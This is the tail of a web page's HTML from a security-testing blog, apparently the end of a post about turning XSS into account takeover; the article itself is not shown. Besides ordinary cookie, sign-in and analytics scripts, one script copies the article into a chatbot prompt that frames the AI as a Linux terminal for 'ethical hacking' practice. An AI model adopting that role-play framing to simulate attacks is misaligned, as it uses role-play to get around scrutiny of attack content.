rel="noopener noreferrer nofollow" href="https://cookiedatabase.org/tcf/purposes/" aria-label="Read more about TCF purposes on Cookie Database">Read more about these purposes</a></li> </ul> </div> <div class="cmplz-divider cmplz-footer"></div> <div class="cmplz-buttons"> <button class="cmplz-btn cmplz-accept">Accept</button> <button class="cmplz-btn cmplz-deny">Deny</button> <button class="cmplz-btn cmplz-view-preferences">View preferences</button> <button class="cmplz-btn cmplz-save-preferences">Save preferences</button> <a class="cmplz-btn cmplz-manage-options tcf cookie-statement" href="#" data-relative_url="#cmplz-manage-consent-container">View preferences</a> </div> <div class="cmplz-documents cmplz-links"> <ul> <li><a class="cmplz-link cookie-statement" href="#" data-relative_url="">{title}</a></li> <li><a class="cmplz-link privacy-statement" href="#" data-relative_url="">{title}</a></li> <li><a class="cmplz-link impressum" href="#" data-relative_url="">{title}</a></li> </ul> </div> </div> </div> <div id="cmplz-manage-consent" data-nosnippet="true"><button class="cmplz-btn cmplz-hidden cmplz-manage-consent manage-consent-1">Manage consent</button> </div> <script> const lazyloadRunObserver = () => { const lazyloadBackgrounds = document.querySelectorAll( `.e-con.e-parent:not(.e-lazyloaded)` ); const lazyloadBackgroundObserver = new IntersectionObserver( ( entries ) => { entries.forEach( ( entry ) => { if ( entry.isIntersecting ) { let lazyloadBackground = entry.target; if( lazyloadBackground ) { lazyloadBackground.classList.add( 'e-lazyloaded' ); } lazyloadBackgroundObserver.unobserve( entry.target ); } }); }, { rootMargin: '200px 0px 200px 0px' } ); lazyloadBackgrounds.forEach( ( lazyloadBackground ) => { lazyloadBackgroundObserver.observe( lazyloadBackground ); } ); }; const events = [ 'DOMContentLoaded', 'elementor/lazyload/observe', ]; events.forEach( ( event ) => { document.addEventListener( event, lazyloadRunObserver ); } ); </script>  <style> .googlesitekit-sign-in-with-google__frontend-output-button{max-width:320px} </style> <script src="https://accounts.google.com/gsi/client"></script> <script> (()=>{async function handleCredentialResponse(response){try{const res=await fetch('https://undercodetesting.com/wp-login.php?action=googlesitekit_auth',{method:'POST',headers:{'Content-Type':'application/x-www-form-urlencoded'},body:new URLSearchParams(response)});/* Preserve comment text in case of redirect after login on a page with a Sign in with Google button in the WordPress comments. / const commentText=document.querySelector('#comment')?.value;const postId=document.querySelectorAll('.googlesitekit-sign-in-with-googlecomments-form-button')?.[0]?.className?.match(/googlesitekit-sign-in-with-googlecomments-form-button-postid-(\d+)/)?.[1];if(!! commentText?.length){sessionStorage.setItem(`siwg-comment-text-${postId}`,commentText);}location.reload();}catch(error){console.error(error);}}if(typeof google !=='undefined'){google.accounts.id.initialize({client_id:'434315219136-8dok14874vc4jqqqsrntljg23lcofrv4.apps.googleusercontent.com',callback:handleCredentialResponse,library_name:'Site-Kit'});}const defaultButtonOptions={"theme":"outline","text":"signin_with","shape":"rectangular"};document.querySelectorAll('.googlesitekit-sign-in-with-google__frontend-output-button').forEach((siwgButtonDiv)=>{const buttonOptions={shape:siwgButtonDiv.getAttribute('data-googlesitekit-siwg-shape')|| defaultButtonOptions.shape,text:siwgButtonDiv.getAttribute('data-googlesitekit-siwg-text')|| defaultButtonOptions.text,theme:siwgButtonDiv.getAttribute('data-googlesitekit-siwg-theme')|| defaultButtonOptions.theme,};if(typeof google !=='undefined'){google.accounts.id.renderButton(siwgButtonDiv,buttonOptions);}});/ If there is a matching saved comment text in sessionStorage,restore it to the comment field and remove it from sessionStorage. */ const postId=document.body.className.match(/postid-(\d+)/)?.[1];const commentField=document.querySelector('#comment');const commentText=sessionStorage.getItem(`siwg-comment-text-${postId}`);if(commentText?.length && commentField && !! postId){commentField.value=commentText;sessionStorage.removeItem(`siwg-comment-text-${postId}`);}})(); </script>  <script> (function() { // Secure configuration const uacConfig = {"selector":"article .entry-content","maxLines":57,"robotSVG":"<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" viewBox=\"0 0 24 24\" width=\"28\" height=\"28\"><path fill=\"#fff\" d=\"M20 9V7c0-1.1-.9-2-2-2h-3c0-1.66-1.34-3-3-3S9 3.34 9 5H6c-1.1 0-2 .9-2 2v2c-1.66 0-3 1.34-3 3s1.34 3 3 3v4c0 1.1.9 2 2 2h12c1.1 0 2-.9 2-2v-4c1.66 0 3-1.34 3-3s-1.34-3-3-3zm-2 10H6V7h12v12zm-9-6c-.83 0-1.5-.67-1.5-1.5S8.17 10 9 10s1.5.67 1.5 1.5S9.83 13 9 13zm7.5-1.5c0 .83-.67 1.5-1.5 1.5s-1.5-.67-1.5-1.5.67-1.5 1.5-1.5 1.5.67 1.5 1.5zM8 15h8v2H8v-2z\"\/><\/svg>","ttsKeywords":["Listen to this Post","Listen","Auto\u2011play on page load","Google Deutsch","Google US English","Google UK English Female","Google UK English Male","Google espa\u00f1ol","Google espa\u00f1ol de Estados Unidos","Google fran\u00e7ais","Google \u0939\u093f\u0928\u094d\u0926\u0940","Google Bahasa Indonesia","Google italiano","Google \u65e5\u672c\u8a9e","Google\u00a0\u666e\u901a\u8bdd","(\u4e2d\u56fd\u5927\u9646)","(zh-CN)","Google \ud55c\uad6d\uc758","Google Nederlands","Google polski","Google portugu\u00eas do Brasil","Google \u0440\u0443\u0441\u0441\u043a\u0438\u0439","Google \u666e\u901a\u8bdd\uff08\u4e2d\u56fd\u5927\u9646\uff09","Google \u7ca4\u8a9e\uff08\u9999\u6e2f\uff09","Google \u570b\u8a9e\uff08\u81fa\u7063\uff09","Google \u666e\u901a\u8bdd\uff08\u4e2d\u56fd\u5927\u9646)","(zh-CN)Google \u7ca4\u8a9e","\uff08\u9999\u6e2f\uff09 (zh-HK)","\ud83d\udc22","\ud83d\ude80"],"copyPrefix":"You are now acting as a Linux terminal. Reply only with the terminal output based on this article. If you understand it, reply with a terminal output: \"undercode@attack-lab:~$\". Help me practice ethical hacking, the article: ","aiInstructions":"\n <div class=\"uac-ai-final\">1- Select AI, then paste the copied content<br>2- The AI will act like a linux emulator<\/div>\n<div class=\"uac-ai-step\">\ud83e\udd16 <a href=\"https:\/\/chat.openai.com\" target=\"_blank\" rel=\"noopener\" style=\"color:#0073e6;\">Continue with ChatGPT (OpenAI)<\/a><\/div>\n<div class=\"uac-ai-step\">\ud83d\udd0d <a href=\"https:\/\/chat.deepseek.com\" target=\"_blank\" rel=\"noopener\" style=\"color:#0073e6;\">Continue with DeepSeek Chat<\/a><\/div>\n<div class=\"uac-ai-step\">\u2601\ufe0f <a href=\"https:\/\/claude.ai\" target=\"_blank\" rel=\"noopener\" style=\"color:#0073e6;\">Continue with Claude AI<\/a><\/div>\n "}; // Advanced TTS removal system function removeTtsElements(element) { // Remove by known TTS classes const ttsClasses = ['tts-player', 'listen-section', 'language-selector']; ttsClasses.forEach(cls => { const elements = element.querySelectorAll(`.${cls}`); elements.forEach(el => el.remove()); }); // Remove by text content using keywords const walker = document.createTreeWalker(element, NodeFilter.SHOW_TEXT); const nodesToRemove = []; let node; while (node = walker.nextNode()) { const text = node.nodeValue.trim(); if (uacConfig.ttsKeywords.some(keyword => text.includes(keyword))) { nodesToRemove.push(node.parentNode); } } // Remove identified TTS nodes nodesToRemove.forEach(node => { if (node && node.parentNode) { node.parentNode.removeChild(node); } }); } document.addEventListener('DOMContentLoaded', function() { const buttons = document.querySelectorAll('.uac-btn'); buttons.forEach(btn => { // Initialize button securely btn.innerHTML = ` <span class="uac-btn-content"> ${uacConfig.robotSVG} <span>AI Pentesting Pro (Based on This Article)🦑</span> </span> `; const originalHTML = btn.innerHTML; btn.addEventListener('click', async function() { const container = document.querySelector(uacConfig.selector); if (!container) { console.warn('Content container not found'); return; } // Clone the container to avoid modifying the original const clone = container.cloneNode(true); // Remove TTS elements removeTtsElements(clone); // Get text content after removing TTS sections const fullText = clone.innerText || clone.textContent || ''; if (!fullText.trim()) { console.warn('No text content found after filtering'); return; } // Split into lines and process const lines = fullText.split('\n') .map(line => line.trim()) .filter(line => line.length > 0); let snippet, displayText; if (lines.length < 3) { snippet = fullText.substring(0, 500); displayText = snippet + (fullText.length > 500 ? '...' : ''); } else { snippet = lines.slice(0, uacConfig.maxLines).join('\n'); displayText = snippet.length > 500 ? snippet.substring(0, 500) + '...' : snippet; } // Add prefix to text to be copied const textToCopy = uacConfig.copyPrefix + '\n\n' + snippet; // Securely copy to clipboard try { await navigator.clipboard.writeText(textToCopy); // Update UI securely btn.classList.add('uac-copied'); btn.innerHTML = ` <span class="uac-btn-content"> ${uacConfig.robotSVG} <span>Scroll to Continue!</span> </span> `; // Create/update message container securely let wrapper = btn.closest('.uac-wrapper'); let messageDiv = wrapper.querySelector('.uac-message'); if (!messageDiv) { messageDiv = document.createElement('div'); messageDiv.className = 'uac-message'; messageDiv.setAttribute('aria-live', 'polite'); messageDiv.setAttribute('role', 'status'); wrapper.appendChild(messageDiv); } // Securely set text content const prefix = document.createElement('div'); prefix.className = 'uac-message-prefix'; prefix.textContent = 'Copied first ' + uacConfig.maxLines + ' lines:'; const content = document.createElement('div'); content.className = 'uac-copied-content'; content.textContent = displayText; // Create AI instructions section const instructions = document.createElement('div'); instructions.className = 'uac-ai-instructions'; instructions.innerHTML = uacConfig.aiInstructions; // Clear existing content safely while (messageDiv.firstChild) { messageDiv.removeChild(messageDiv.firstChild); } messageDiv.appendChild(prefix); messageDiv.appendChild(content); messageDiv.appendChild(instructions); // Add instructions // Reset button after 3 seconds setTimeout(() => { btn.classList.remove('uac-copied'); btn.innerHTML = originalHTML; }, 3000); } catch (err) { console.error('Copy failed:', err); btn.classList.add('uac-error'); btn.innerHTML = ` <span class="uac-btn-content"> ${uacConfig.robotSVG} <span>Error!</span> </span> `; setTimeout(() => { btn.classList.remove('uac-error'); btn.innerHTML = originalHTML; }, 3000); } }); }); }); })(); </script> <script id="astra-theme-js-js-extra"> var astra = {"break_point":"921","isRtl":"","is_scroll_to_id":"1","is_scroll_to_top":"","is_header_footer_builder_active":"1","responsive_cart_click":"flyout","is_dark_palette":""}; //# sourceURL=astra-theme-js-js-extra </script> <script id="astra-theme-js-js" src="https://undercodetesting.com/wp-content/themes/astra/assets/js/minified/frontend.min.js?ver=4.13.3"></script> <script id="sac-js" src="https://undercodetesting.com/wp-content/plugins/simple-ajax-chat/resources/sac.php?ver=20260422"></script> <script id="uctts-script-js-extra"> var ucttsConfig = {"selector":".entry-content.clear","rates":{"slow":0.75,"normal":1,"fast":1.5},"locale":"en-US","version":"3.2.20"}; //# sourceURL=uctts-script-js-extra </script> <script id="uctts-script-js" src="https://undercodetesting.com/wp-content/plugins/undercode-tts_ut/js/uctts-script_v3220.js?ver=3.2.20"></script> <script id="enlighterjs-js" src="https://undercodetesting.com/wp-content/plugins/enlighter/cache/enlighterjs.min.js?ver=WYxHAFvXmhTdHol"></script> <script id="enlighterjs-js-after"> !function(e,n){if("undefined"!=typeof EnlighterJS){var o={"selectors":{"block":"pre.EnlighterJSRAW","inline":"code.EnlighterJSRAW"},"options":{"indent":4,"ampersandCleanup":true,"linehover":true,"rawcodeDbclick":false,"textOverflow":"break","linenumbers":true,"theme":"beyond","language":"generic","retainCssClasses":false,"collapse":false,"toolbarOuter":"","toolbarTop":"{BTN_RAW}{BTN_COPY}{BTN_WINDOW}{BTN_WEBSITE}","toolbarBottom":""}};(e.EnlighterJSINIT=function(){EnlighterJS.init(o.selectors.block,o.selectors.inline,o.options)})()}else{(n&&(n.error||n.log)||function(){})("Error: EnlighterJS resources not loaded yet!")}}(window,console); //# sourceURL=enlighterjs-js-after </script> <script id="jetpack-stats-js-before"> _stq = window._stq || []; _stq.push([ "view", {"v":"ext","blog":"181153575","post":"28428","tz":"0","srv":"undercodetesting.com","j":"1:15.8"} ]); _stq.push([ "clickTrackerInit", "181153575", "28428" ]); //# sourceURL=jetpack-stats-js-before </script> <script type="text/plain" data-service="jetpack-statistics" data-category="statistics" data-wp-strategy="defer" defer id="jetpack-stats-js" data-cmplz-src="https://stats.wp.com/e-202623.js"></script> <script id="cmplz-cookiebanner-js-extra"> var complianz = {"prefix":"cmplz_","user_banner_id":"1","set_cookies":[],"block_ajax_content":"","banner_version":"36","version":"7.4.6","store_consent":"","do_not_track_enabled":"1","consenttype":"optin","region":"eu","geoip":"","dismiss_timeout":"","disable_cookiebanner":"","soft_cookiewall":"","dismiss_on_scroll":"","cookie_expiry":"365","url":"https://undercodetesting.com/wp-json/complianz/v1/","locale":"lang=en&locale=en_US","set_cookies_on_root":"","cookie_domain":"","current_policy_id":"29","cookie_path":"/","categories":{"statistics":"statistics","marketing":"marketing"},"tcf_active":"","placeholdertext":"Click to accept {category} cookies and enable this content","css_file":"https://undercodetesting.com/wp-content/uploads/complianz/css/banner-{banner_id}-{type}.css?v=36","page_links":{"eu":{"cookie-statement":{"title":"Cookie Policy","url":"https://undercodetesting.com/privacy-policy/"},"privacy-statement":{"title":"Privacy Statement","url":"https://undercodetesting.com/privacy-policy/"},"impressum":{"title":"Impressum","url":"https://undercodetesting.com/privacy-policy/"}},"us":{"impressum":{"title":"Impressum","url":"https://undercodetesting.com/privacy-policy/"}},"uk":{"impressum":{"title":"Impressum","url":"https://undercodetesting.com/privacy-policy/"}},"ca":{"impressum":{"title":"Impressum","url":"https://undercodetesting.com/privacy-policy/"}},"au":{"impressum":{"title":"Impressum","url":"https://undercodetesting.com/privacy-policy/"}},"za":{"impressum":{"title":"Impressum","url":"https://undercodetesting.com/privacy-policy/"}},"br":{"impressum":{"title":"Impressum","url":"https://undercodetesting.com/privacy-policy/"}}},"tm_categories":"","forceEnableStats":"","preview":"","clean_cookies":"","aria_label":"Click to accept {category} cookies and enable this content"}; //# sourceURL=cmplz-cookiebanner-js-extra </script> <script defer id="cmplz-cookiebanner-js" src="https://undercodetesting.com/wp-content/plugins/complianz-gdpr/cookiebanner/js/complianz.min.js?ver=1776682381"></script> <script id="cmplz-cookiebanner-js-after"> if ('undefined' != typeof window.jQuery) { jQuery(document).ready(function ($) { $(document).on('elementor/popup/show', () => { let rev_cats = cmplz_categories.reverse(); for (let key in rev_cats) { if (rev_cats.hasOwnProperty(key)) { let category = cmplz_categories[key]; if (cmplz_has_consent(category)) { document.querySelectorAll('[data-category="' + category + '"]').forEach(obj => { cmplz_remove_placeholder(obj); }); } } } let services = cmplz_get_services_on_page(); for (let key in services) { if (services.hasOwnProperty(key)) { let service = services[key].service; let category = services[key].category; if (cmplz_has_service_consent(service, category)) { document.querySelectorAll('[data-service="' + service + '"]').forEach(obj => { cmplz_remove_placeholder(obj); }); } } } }); }); } document.addEventListener("cmplz_enable_category", function(consentData) { var category = consentData.detail.category; var services = consentData.detail.services; var blockedContentContainers = []; let selectorVideo = '.cmplz-elementor-widget-video-playlist[data-category="'+category+'"],.elementor-widget-video[data-category="'+category+'"]'; let selectorGeneric = '[data-cmplz-elementor-href][data-category="'+category+'"]'; for (var skey in services) { if (services.hasOwnProperty(skey)) { let service = skey; selectorVideo +=',.cmplz-elementor-widget-video-playlist[data-service="'+service+'"],.elementor-widget-video[data-service="'+service+'"]'; selectorGeneric +=',[data-cmplz-elementor-href][data-service="'+service+'"]'; } } document.querySelectorAll(selectorVideo).forEach(obj => { let elementService = obj.getAttribute('data-service'); if ( cmplz_is_service_denied(elementService) ) { return; } if (obj.classList.contains('cmplz-elementor-activated')) return; obj.classList.add('cmplz-elementor-activated'); if ( obj.hasAttribute('data-cmplz_elementor_widget_type') ){ let attr = obj.getAttribute('data-cmplz_elementor_widget_type'); obj.classList.removeAttribute('data-cmplz_elementor_widget_type'); obj.classList.setAttribute('data-widget_type', attr); } if (obj.classList.contains('cmplz-elementor-widget-video-playlist')) { obj.classList.remove('cmplz-elementor-widget-video-playlist'); obj.classList.add('elementor-widget-video-playlist'); } obj.setAttribute('data-settings', obj.getAttribute('data-cmplz-elementor-settings')); blockedContentContainers.push(obj); }); document.querySelectorAll(selectorGeneric).forEach(obj => { let elementService = obj.getAttribute('data-service'); if ( cmplz_is_service_denied(elementService) ) { return; } if (obj.classList.contains('cmplz-elementor-activated')) return; if (obj.classList.contains('cmplz-fb-video')) { obj.classList.remove('cmplz-fb-video'); obj.classList.add('fb-video'); } obj.classList.add('cmplz-elementor-activated'); obj.setAttribute('data-href', obj.getAttribute('data-cmplz-elementor-href')); blockedContentContainers.push(obj.closest('.elementor-widget')); }); /** * Trigger the widgets in Elementor / for (var key in blockedContentContainers) { if (blockedContentContainers.hasOwnProperty(key) && blockedContentContainers[key] !== undefined) { let blockedContentContainer = blockedContentContainers[key]; if (elementorFrontend.elementsHandler) { elementorFrontend.elementsHandler.runReadyTrigger(blockedContentContainer) } var cssIndex = blockedContentContainer.getAttribute('data-placeholder_class_index'); blockedContentContainer.classList.remove('cmplz-blocked-content-container'); blockedContentContainer.classList.remove('cmplz-placeholder-' + cssIndex); } } }); let cmplzBlockedContent = document.querySelector('.cmplz-blocked-content-notice'); if ( cmplzBlockedContent) { cmplzBlockedContent.addEventListener('click', function(event) { event.stopPropagation(); }); } //# sourceURL=cmplz-cookiebanner-js-after </script> <script id="gt_widget_script_82776470-js-before"> window.gtranslateSettings = / document.write / window.gtranslateSettings || {};window.gtranslateSettings['82776470'] = {"default_language":"en","languages":["af","sq","ar","zh-CN","hr","nl","en","et","tl","fi","fr","de","el","iw","hi","id","it","ja","ku","la","pl","pt","ro","ru","es","sv","ta","te","tr","uk"],"url_structure":"none","native_language_names":1,"detect_browser_language":1,"flag_style":"3d","flag_size":24,"wrapper_selector":"#gt-wrapper-82776470","alt_flags":{"en":"usa"},"horizontal_position":"inline","flags_location":"\/wp-content\/plugins\/gtranslate\/flags\/"}; //# sourceURL=gt_widget_script_82776470-js-before </script><script src="https://undercodetesting.com/wp-content/plugins/gtranslate/js/popup.js?ver=ca87a88d26a9da37af590fea05c39b78" data-no-optimize="1" data-no-minify="1" data-gt-orig-url="/how-i-got-this-xss-to-account-takeover/" data-gt-orig-domain="undercodetesting.com" data-gt-widget-id="82776470" defer></script> <script> /(trident|msie)/i.test(navigator.userAgent)&&document.getElementById&&window.addEventListener&&window.addEventListener("hashchange",function(){var t,e=location.hash.substring(1);/^[A-z0-9_-]+$/.test(e)&&(t=document.getElementById(e))&&(/^(?:a|select|input|button|textarea)$/i.test(t.tagName)||(t.tabIndex=-1),t.focus())},!1); </script> <script id="wp-emoji-settings" type="application/json"> {"baseUrl":"https://s.w.org/images/core/emoji/17.0.2/72x72/","ext":".png","svgUrl":"https://s.w.org/images/core/emoji/17.0.2/svg/","svgExt":".svg","source":{"concatemoji":"https://undercodetesting.com/wp-includes/js/wp-emoji-release.min.js?ver=ca87a88d26a9da37af590fea05c39b78"}} </script> <script type="module"> /! This file is auto-generated */ const a=JSON.parse(document.getElementById("wp-emoji-settings").textContent),o=(window._wpemojiSettings=a,"wpEmojiSettingsSupports"),s=["flag","emoji"];function i(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function c(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data);e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0);const a=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data);return t.every((e,t)=>e===a[t])}function p(e,t){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var n=e.getImageData(16,16,1,1);for(let e=0;e<n.data.length;e++)if(0!==n.data[e])return!1;return!0}function u(e,t,n,a){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\udde8\ud83c\uddf6","\ud83c\udde8\u200b\ud83c\uddf6")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!a(e,"\ud83e\u1fac8")}return!1}function f(e,t,n,a){let r;const o=(r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):document.createElement("canvas")).getContext("2d",{willReadFrequently:!0}),s=(o.textBaseline="top",o.font="600 32px Arial",{});return e.forEach(e=>{s[e]=t(o,e,n,a)}),s}function r(e){var t=document.createElement("script");t.src=e,t.defer=!0,document.head.appendChild(t)}a.supports={everything:!0,everythingExceptFlag:!0},new Promise(t=>{let n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),c.toString(),p.toString()].join(",")+"));",a=new Blob([e],{type:"text/javascript"});const r=new Worker(URL.createObjectURL(a),{name:"wpTestEmojiSupports"});return void(r.onmessage=e=>{i(n=e.data),r.terminate(),t(n)})}catch(e){}i(n=f(s,u,c,p))}t(n)}).then(e=>{for(const n in e)a.supports[n]=e[n],a.supports.everything=a.supports.everything&&a.supports[n],"flag"!==n&&(a.supports.everythingExceptFlag=a.supports.everythingExceptFlag&&a.supports[n]);var t;a.supports.everythingExceptFlag=a.supports.everythingExceptFlag&&!a.supports.flag,a.supports.everything||((t=a.source||{}).concatemoji?r(t.concatemoji):t.wpemoji&&t.twemoji&&(r(t.twemoji),r(t.wpemoji)))}); //# sourceURL=https://undercodetesting.com/wp-includes/js/wp-emoji-loader.min.js </script> </body> </html>